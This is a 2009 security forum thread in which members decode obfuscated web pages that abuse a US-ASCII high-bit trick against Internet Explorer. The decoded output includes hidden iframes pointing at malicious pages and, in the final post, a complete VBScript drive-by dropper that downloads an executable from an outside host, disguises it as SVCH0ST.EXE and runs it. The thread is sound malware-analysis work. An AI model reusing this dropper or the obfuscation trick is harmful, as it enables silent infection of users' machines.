Malware Domain List

Malware Related => Malware Analysis => Topic started by: JohnC on June 15, 2009, 08:23:27 pm

Title: Malicious code?
Post by: JohnC on June 15, 2009, 08:23:27 pm
masteranalyse.com/dark.htm

Code: [Select]
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=US-ASCII" />
<title></title>       
</head><body>
 㽰 轰 徊  轰 徊  轱 徊  轱 徊  轱 徊  轱 徊
</body></html>

http://www.virustotal.com/analisis/e46e839e5f3c57e3af507937af2a1b8dec90e23a70473e17bf53cd52c17827ee-1245097235
Title: Re: Malicious code?
Post by: MysteryFCM on June 15, 2009, 09:21:48 pm
Doesn't appear to be malicious?
Title: Re: Malicious code?
Post by: CkreM on June 15, 2009, 11:05:09 pm
looks like just some unidentified characters to me
Title: Re: Malicious code?
Post by: miyoko on June 16, 2009, 02:17:32 am
it actually a malicous code, it got 6 iframes inside.

the methods I use to decode it is remove all the , host it and run it on browser, the iframe will show up.

in US-ASCII is <

don't know if there's any easy way to decode it
Title: Re: Malicious code?
Post by: CkreM on June 16, 2009, 02:33:40 am
it actually a malicous code, it got 6 iframes inside.

the methods I use to decode it is remove all the , host it and run it on browser, the iframe will show up.

in US-ASCII is <

don't know if there's any easy way to decode it


nice :)
 
Code: [Select]
iframe src=06014.htm width=0 height=0>/iframe> iframe src=Ajax.htm width=0 height=0>/iframe> iframe src=Pps.htm width=1 height=1>/iframe> iframe src=Reader.htm width=1 height=1>/iframe> iframe src=Storm.htm width=1 height=1>/iframe> iframe src=Web.htm width=1 height=1>/iframe>

masteranalyse.com/Ajax.htm
masteranalyse.com/Pps.htm
masteranalyse.com/Reader.htm
masteranalyse.com/Storm.htm
masteranalyse.com/Web.htm
masteranalyse.com/06014.htm

need to decode each of them also...
Title: Re: Malicious code?
Post by: MysteryFCM on June 16, 2009, 12:28:27 pm
Nice one miyoko, cheers :)
Title: Re: Malicious code?
Post by: SysAdMini on June 16, 2009, 03:00:11 pm
US-ASCII uses only 7 bit. The highest bit was only set by the author for obfuscation.
The browser interprets the char set instruction correctly and ignores the highest bit.

You can decode it in Malzilla using this function:
Code: [Select]
y = " 㽰 轰 徊 轰 徊 轱 徊 轱 徊 轱 徊 轱 徊";
for(i=0;i<y.length;i++) {
document.write(String.fromCharCode(127 & y.charCodeAt(i)));
}
Title: Re: Malicious code?
Post by: SysAdMini on June 17, 2009, 05:24:52 pm
I was wondering if it's a known issue.
It is. I've found a two years old article about it.

http://www.avertlabs.com/research/blog/index.php/2007/04/08/malware-exploits-microsoft-feature-along-with-vulnerabilities/

It seems that only the IE is vulnerable.
Here is a test page to check your browser.

http://www.malwaredomainlist.com/test/7bits.htm
Title: Re: Malicious code?
Post by: MysteryFCM on June 17, 2009, 05:45:24 pm
Just loaded the test page in Avant with JS enabled, and then in IE8 itself, and no message box :)
Title: Re: Malicious code?
Post by: JohnC on June 17, 2009, 10:31:21 pm
I recall coming across something similar in the past, but didn't really know how it worked, and didn't bother to question it. But remembered it did have detections. The title of the page was normally something like "Super IE 0day".

8568985.com/garegky/egk.htm

Code: [Select]
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=US-ASCII" />
<title>super IE 0Day</title>
</head>
<body>
 形   ս𺯯墍   ⢦墦㢦 ᢦ䢬 㢦󢦢颦Ĺõİâòųн͢㢦󢦢梦آ̢͢ȢԢТ   Ь ǢԢ լ 半䍊形֢ȢԮŢ֢ȢԮӢ   颦𢦢Ƣ颦墦墦Ϣ墦   ɮ򨲩ɮ婍ɮ󩍊䢍½䢦⢦󢦢墦潢Ӣ袦墦좦좦𢦢𢦢좦颦㢦ᢍͽ   ͬڮ影ڮڮ ڮ 嬲ڮ半ڮ彲ڮڮ    榢   㢢Ӣ좢榢Ӯ 妢榢   碍ڮ 󬲍ڮ半   榢 ᬢ
</body>
</html>

http://www.virustotal.com/analisis/de7da2635da6a92e843beea82101bdfcb9b1aecc48404f8be25f8211dd06c87b-1245277903
Title: Re: Malicious code?
Post by: philipp on June 26, 2009, 09:30:40 am
Code: [Select]
philipp@desktop:~/analysis$ curl -s http://8568985.com/garegky/egk.htm | perl -pe 'tr/\200-\377/\000-\177/'
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=US-ASCII" />
<title>super IE 0Day</title>
</head>
<body>
<Script Language="VBScript">
On Error Resume Next
CnLRU="http://www.8568985.com/garegky/jpmm.exe"
Set A0 = document.createElement("ob"&"je"&"c"&"t")
A0.SetAttribute "cla"&"ssid", "c"&"ls"&"i"&"d:BD9"&"6C55"&"6-65"&"A3-11D0"&"-983A-00C"&"04FC29"&"E36"
sHTTP="M"&"ic"&"ro"&"s"&"of"&"t"&".X"&"M"&"L"&"H"&"TT"&"P"
Set Pop = A0.CreateObject(sHTTP,"")
Pop.Open "G"&"ET", CnLRU, False
Pop.Send
Exe="SV"&"CH"&"0ST.EXE"
Vbs="SV"&"CH"&"OST.VBS"
Set FPI = A0.createobject("Scri"&"p"&"ting.F"&"i"&"le"&"Sy"&"st"&"e"&"mO"&"bje"&"ct","")
Set sTmp = FPI.GetSpecialFolder(2)
Exe=FPI.BuildPath(sTmp,Exe)
Vbs=FPI.BuildPath(sTmp,Vbs)
AA="A"&"d"
AB="o"&"d"&"b"&"."&"s"&"tre"&"am"
fffff="S"&"h"&"e"&"l"&"l"&"."&"A"&"p"&"p"&"l"&"i"&"c"&"a"
AdM=AA&AB
Set ZZ = A0.createobject(AdM,"")
ZZ.type=1
ZZ.Open
ZZ.Write Pop.ResponseBody
ZZ.Savetofile Exe,2
ZZ.Close
ZZ.Type=2
ZZ.Open
ZZ.WriteText "On Error Resume Next"&vbCrLf&"Set S = CreateObject(""Wsc""&""ript.S""&""hell"")"&vbCrLf&"S.Run ("""&Exe&""")"&vbCrLf&"Set S = Nothing"
ZZ.Savetofile Vbs,2
ZZ.Close
Set MircoLonga = A0.createobject(fffff&"tion","")
MircoLonga.ShellExecute Vbs,aaa,aaa,"Open",0
</Script>
</body>
</html>

edit: changed quote- to code-tags to disable links